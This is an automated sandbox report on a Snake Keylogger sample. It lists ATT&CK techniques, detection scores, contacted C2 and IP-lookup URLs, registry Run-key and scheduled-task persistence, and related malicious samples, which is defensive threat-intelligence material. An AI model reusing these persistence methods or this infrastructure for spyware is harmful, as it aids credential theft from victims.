                  | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 51 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 51 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  [Behavior graph: ID: 1500036, Sample: doc1.exe, Startdate: 27/08/2024, Architecture: WINDOWS, Score: 100]

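                  | Source | Detection | Scanner | Label | Link |
                  | --- | --- | --- | --- | --- |
                  | doc1.exe | 53% | ReversingLabs | Win32.Spyware.Snakekeylogger | |
                  | doc1.exe | 100% | Joe Sandbox ML | | |

                  | Source | Detection | Scanner | Label | Link |
                  | --- | --- | --- | --- | --- |
                  | C:\Users\user\AppData\Roaming\bosotkm.exe | 53% | ReversingLabs | Win32.Spyware.Snakekeylogger | |

                  No Antivirus matches
                  No Antivirus matches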

                  | Source | Detection | Scanner | Label | Link |
                  | --- | --- | --- | --- | --- |
                  | https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe | |
                  | https://g.live.com/odclientsettings/ProdV21C: | 0% | URL Reputation | safe | |
                  | http://checkip.dyndns.org | 0% | URL Reputation | safe | |
                  | https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe | |
                  | http://schemas.microso | 0% | URL Reputation | safe | |
                  | https://g.live.com/odclientsettings/Prod1C: | 0% | URL Reputation | safe | |
                  | http://checkip.dyndns.org/ | 0% | URL Reputation | safe | |
                  | https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe | |
                  | https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe | |
                  | https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe | |
                  | http://checkip.dyndns.org/q | 0% | URL Reputation | safe | |
                  | http://144.91.79.54/2508/file | 0% | Avira URL Cloud | safe | |
                  | http://reallyfreegeoip.org | 0% | URL Reputation | safe | |
                  | https://reallyfreegeoip.org | 0% | URL Reputation | safe | |
                  | http://checkip.dyndns.com | 0% | URL Reputation | safe | |
                  | https://github.com/mgravell/protobuf-netJ | 0% | Avira URL Cloud | safe | |
                  | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
                  | https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe | |
                  | http://crl.ver) | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/file0F? | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/M | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txt | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54:80/2508/s | 0% | Avira URL Cloud | safe | |
                  | https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/v | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/ThXb4tU1jp1fQQFsQkY1.txtb | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/r | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/; | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/s | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/4 | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/ | 0% | Avira URL Cloud | safe | |
                  | https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/ | 0% | Avira URL Cloud | safe | |
                  | http://144.91.79.54/2508/filewF | 0% | Avira URL Cloud | safe | |

                  | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                  | --- | --- | --- | --- | --- | --- |
                  | reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown |
                  | fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown |
                  | checkip.dyndns.com | 158.101.44.242 | true | false | | unknown |
                  | checkip.dyndns.org | unknown | unknown | true | | unknown |

                  | Name | Malicious | Antivirus Detection | Reputation |
                  | --- | --- | --- | --- |
                  | https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown |
                  | http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown |

                  Name | Source | Malicious | Antivirus Detection | Reputation
                          unknown
                          http://schemas.microsowscript.exe, 00000003.00000003.2323886447.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329661615.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2326342412.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2328065250.0000000000BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://g.live.com/odclientsettings/Prod1C:qmgr.db.53.drfalse
                          • URL Reputation: safe
                          unknown
                          https://github.com/mgravell/protobuf-netidoc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$InstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://stackoverflow.com/q/11564914/23354;doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://stackoverflow.com/q/2152978/23354doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://144.91.79.54/2508/filewFwscript.exe, 00000003.00000003.2328017986.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2323812806.0000000000C2C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.org/qdoc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://144.91.79.54/wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://reallyfreegeoip.orgInstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002AE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.orgInstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://144.91.79.54/2508/wscript.exe, 00000003.00000003.2323886447.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2327895356.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324767927.0000000000BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2325391333.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2324540081.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.2329453156.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.comInstallUtil.exe, 00000004.00000002.3461729638.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BB3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D52000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 
0000001A.00000002.3460956266.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002FA9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.000000000300D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://144.91.79.54/4wscript.exe, 00000003.00000003.2303011239.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.2310964537.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedoc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002E51000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/doc1.exe, 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2293545434.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3461729638.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3443050167.000000000041B000.00000040.00000400.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.0000000003278000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.000000000442B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.0000000003461000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3460895487.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.3460956266.0000000002F16000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          144.91.79.54 | unknown | Germany | 51167 | CONTABODE | true
                          188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
                          158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                          IP
                          127.0.0.1
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1500036
                          Start date and time:2024-08-27 20:02:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 50s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:54
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:doc1.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winEXE@59/79@2/4
                          EGA Information:
                          • Successful, ratio: 90.9%
                          HCA Information:
                          • Successful, ratio: 94%
                          • Number of executed functions: 478
                          • Number of non-executed functions: 38
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Microsoft.Photos.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 40.113.110.67, 23.60.201.147, 20.114.59.183, 192.229.221.95, 52.165.164.15, 93.184.221.240, 52.168.117.173, 20.166.126.56, 20.42.73.29, 13.89.179.12, 20.189.173.21, 20.189.173.20, 184.28.90.27
                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, wildcard.weather.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, onedsblobprdwus16.westus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, e15275.d.akamaiedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, tile-service.weather.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, fe
                          • Execution Graph export aborted for target InstallUtil.exe, PID 5392 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: doc1.exe
                          Time | Type | Description
                          14:03:15 | API Interceptor | 10x Sleep call for process: wscript.exe modified
                          14:03:19 | API Interceptor | 1437328x Sleep call for process: InstallUtil.exe modified
                          14:03:22 | API Interceptor | 229x Sleep call for process: powershell.exe modified
                          14:03:29 | API Interceptor | 5x Sleep call for process: wermgr.exe modified
                          14:03:30 | API Interceptor | 5x Sleep call for process: WerFault.exe modified
                          14:04:58 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                          20:03:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bosotkm C:\Users\user\AppData\Roaming\bosotkm.exe
                          20:03:17 | Task Scheduler | Run new task: fNUATsLGslepRpn path: C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs
                          20:03:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bosotkm C:\Users\user\AppData\Roaming\bosotkm.exe
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          144.91.79.54 | Reservations_00206.vbe | malicious | AgentTesla | 144.91.79.54/2108/file
                          188.114.97.3 | Rudvfa0Z17.exe | malicious | Nitol | web.ad87h92j.com/4/t.bmp
                          188.114.97.3 | nOyswc9ly2.dll | malicious | Unknown | web.ad87h92j.com/4/t.bmp
                          188.114.97.3 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/0U9QqTZ6/download
                          188.114.97.3 | QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | filetransfer.io/data-package/e0pM9Trc/download
                          188.114.97.3 | steam_module_x64.exe | malicious | DCRat, PureLog Stealer, zgRAT | 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                          188.114.97.3 | http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jsp | malicious | Unknown | membership.garenaa.id.vn/user/login/images/fb_ico.png
                          188.114.97.3 | Bonelessness.exe | malicious | Simda Stealer | lysyvan.com/login.php
                          188.114.97.3 | 700987654656676.exe | malicious | DBatLoader, FormBook | www.coinwab.com/kqqj/?eJ=7HHhUI7NBywWL5iw6vBoOC1R9nc6cE2Y1UmgCStXrWBBqhu9PJUZU2f6gs8mUMG7LvvYO9vLlwJ8Ne8neaHQQZFpXb2jdQdMFopJRCp5HeIQieixqdhWtgQ=&zPCT=URo4h
                          188.114.97.3 | PI#220824.exe | malicious | FormBook | www.bbyul.shop/1i58/
                          188.114.97.3 | Document 21824RXVPO.exe | malicious | FormBook, PureLog Stealer | www.avantfize.shop/y1j7/
                          158.101.44.242 | Nakliye belgeleri.bat.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                          158.101.44.242 | SOA-Al Daleel -Star Electromechanical.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                          158.101.44.242 | GP Design INV20230103 $68,320.exe | malicious | Unknown | checkip.dyndns.org/
                          158.101.44.242 | GP Design INV20230103 $68,320.exe | malicious | Unknown | checkip.dyndns.org/
                          158.101.44.242 | QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                          158.101.44.242 | 7z.exe | malicious | Agent Tesla, AgentTesla | checkip.dyndns.org/
                          158.101.44.242 | lYL8naoHXw.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                          158.101.44.242 | NEW.P.ORDER .ENQUIRY56433.PDF.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                          158.101.44.242 | Copia r#U00e1pida.exe | malicious | Snake Keylogger | checkip.dyndns.org/
                          158.101.44.242 | Order Confirmation.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          reallyfreegeoip.org | Statement of Account.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                          reallyfreegeoip.org | FedEx Shipping Confirmation.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
                          reallyfreegeoip.org | Remesas Aceptadas.PDF.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
